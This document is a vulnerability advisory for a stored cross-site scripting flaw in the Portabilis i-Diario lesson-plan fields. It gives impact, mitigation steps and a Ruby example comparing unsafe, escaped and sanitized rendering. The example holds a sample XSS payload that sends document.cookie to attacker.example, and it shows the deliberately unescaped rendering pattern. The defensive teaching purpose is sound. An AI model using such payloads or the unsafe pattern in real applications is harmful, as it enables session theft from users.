CVE-2025-8788: Cross Site Scripting in Portabilis i-Diario
A vulnerability was found in Portabilis i-Diario up to 1.5.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /planos-de-aula-por-areas-de-conhecimento/ of the component Informações adicionais. The manipulation of the argument Parecer/Conteúdos/Objetivos leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
AI Analysis
Technical Summary
CVE-2025-8788 is a cross-site scripting (XSS) vulnerability in Portabilis i-Diario up to version 1.5.0. It lies in the 'Informações adicionais' component of the lesson-plan-by-knowledge-area feature served at /planos-de-aula-por-areas-de-conhecimento/. Input submitted in the Parecer, Conteúdos and Objetivos fields is rendered back into the page without adequate validation or output encoding, so an attacker who can write to those fields can embed HTML and JavaScript that executes in the browser of any user who views the affected content. The CVSS 4.0 base score is 5.1 (medium). The vector is AV:N/AC:L/PR:L/UI:P: the attack is launched over the network with low complexity, it requires low privileges (an account able to submit these fields, not an unauthenticated attacker), and the user interaction is passive, meaning the victim triggers the payload by opening the affected page in the normal course of use rather than by clicking something unusual. Impact on confidentiality and integrity is limited: an injected script runs with the victim's session and can read what the victim can read, act as the victim, deface the page or redirect to an attacker-controlled site; availability is not directly affected. The vendor was notified early but has not responded, and no patch is available. No in-the-wild exploitation has been reported, but the exploit has been disclosed publicly, which lowers the bar for attempts.
Potential Impact
For European organizations using Portabilis i-Diario, particularly schools and education authorities that rely on it for lesson planning by knowledge area, this vulnerability is a tangible risk. Successful exploitation could lead to session hijacking, actions performed in the victim's name, or delivery of further payloads through the injected script. That could expose sensitive educational data, disrupt normal operations and damage trust in the platform. Because the payload fires when a user views the affected content, an attacker with an account could plant it and wait for teachers or administrators to open the lesson plan, or use phishing to steer users to the page sooner. The absence of a vendor response and of a patch lengthens the window of exposure. Since the software handles data about minors, an incident could also raise GDPR obligations and reputational concerns.
Mitigation Recommendations
1. As a stopgap, deploy a web application firewall with rules that block or log script-like input (tags, event-handler attributes, javascript: URLs) in the Parecer, Conteúdos and Objetivos parameters; treat this as detection and friction, not a fix, since WAF rules are bypassable.
2. Fix the rendering: apply context-aware output encoding wherever these fields are displayed (HTML-escape on output rather than relying on input filters alone). If a field must keep simple formatting, run it through an allowlist sanitizer that keeps a small set of harmless tags and strips all attributes.
3. Educate users about the risks of clicking untrusted links and encourage caution with unsolicited communications.
4. Monitor application and web-server logs for repeated submissions to the affected endpoint containing markup, and for the same account writing script-like content to several lesson plans.
5. Where possible, restrict who can edit lesson plans to trusted staff, or isolate the vulnerable component, until an official fix is released.
6. Engage with the vendor or the project community to push for an official patch, and consider alternative software if the vendor remains unresponsive.
7. Include the application in regular security assessments and penetration tests focused on web vulnerabilities so similar issues are found proactively.
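The following Ruby example illustrates the root cause described in the technical summary and the output-encoding fix recommended in item 2 above. It is added here and is not code from i-Diario or from this advisory; it assumes the application is a Ruby on Rails app (hence Ruby), and the "vulnerable" render function is an illustrative pattern, not the project's actual view code. The payload string is constructed for the example and is not the published exploit. The minimal allowlist sanitizer is written for this example only; in a real Rails app you would use the rails-html-sanitizer gem rather than a hand-rolled one.

```ruby
require "erb"

# Constructed sample: something an authenticated user could submit in the
# Parecer field of a lesson plan. Illustrative only, not the published exploit.
PAYLOAD = %q{<img src=x onerror="fetch('https://attacker.example/?c='+document.cookie)">}

# Vulnerable pattern (assumed, not i-Diario's real view code): the stored field
# is concatenated straight into the HTML, so any markup or event handler the
# user typed becomes part of the page and runs for whoever views it.
def render_unsafe(parecer)
  "<dt>Parecer</dt><dd>#{parecer}</dd>"
end

# Fix 1: HTML-escape at render time. The user's text is shown literally and
# no markup survives. This is the default for ERB/Rails interpolation unless
# the value is marked html_safe or passed through raw.
def render_escaped(parecer)
  "<dt>Parecer</dt><dd>#{ERB::Util.html_escape(parecer)}</dd>"
end

# Fix 2: when a field must keep simple formatting, allow a handful of
# attribute-less tags and escape everything else. Attributes are always
# dropped, which removes onerror/onclick/href-based vectors.
ALLOWED_TAGS = %w[b i u p br ul ol li strong em].freeze

def sanitize_allowlist(html)
  # Tokenise into: a complete tag, a run of text, or a stray "<".
  html.gsub(%r{<(/?)([a-zA-Z0-9]+)[^>]*>|([^<]+)|(<)}) do
    if $3
      ERB::Util.html_escape($3)                   # plain text
    elsif $4
      "&lt;"                                      # lone "<" that starts no tag
    elsif ALLOWED_TAGS.include?($2.downcase)
      "<#{$1}#{$2.downcase}>"                     # allowed tag, attributes dropped
    else
      ERB::Util.html_escape($&)                   # disallowed tag shown as text
    end
  end
end

def render_sanitized(parecer)
  "<dt>Parecer</dt><dd>#{sanitize_allowlist(parecer)}</dd>"
end

# Check used to compare the three renderers: does the output contain any tag
# that carries attributes, or a <script> tag? The escaped and sanitized forms
# never emit attributes, so a true result means the user controlled markup.
def executable_html?(html)
  html.scan(/<\/?([a-zA-Z0-9]+)([^>]*)>/).any? do |name, attrs|
    name.downcase == "script" || !attrs.strip.empty?
  end
end

if __FILE__ == $0
  [["unsafe", render_unsafe(PAYLOAD)],
   ["escaped", render_escaped(PAYLOAD)],
   ["sanitized", render_sanitized(PAYLOAD)]].each do |label, html|
    puts "#{label.ljust(9)} executable=#{executable_html?(html)}  #{html}"
  end
end
```

Running the file shows the payload surviving only in the unsafe renderer. The sanitizer keeps `<b>Aluno</b>` intact while turning `<script>` and `<b onclick="x">` into harmless output, which is the behaviour to require of whatever library the application actually uses.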
Affected Countries
Portugal, Spain, Italy, France, Germany, Belgium, Netherlands
Technical Details
- Data Version: 5.1
- Assigner Short Name: VulDB
- Date Reserved: 2025-08-09T05:11:26.097Z
- CVSS Version: 4.0
- State: PUBLISHED
Threat ID: 68980147ad5a09ad0010c093
Added to database: 8/10/2025, 2:17:43 AM
Last enriched: 8/18/2025, 12:58:44 AM
Last updated: 9/26/2025, 4:00:11 AM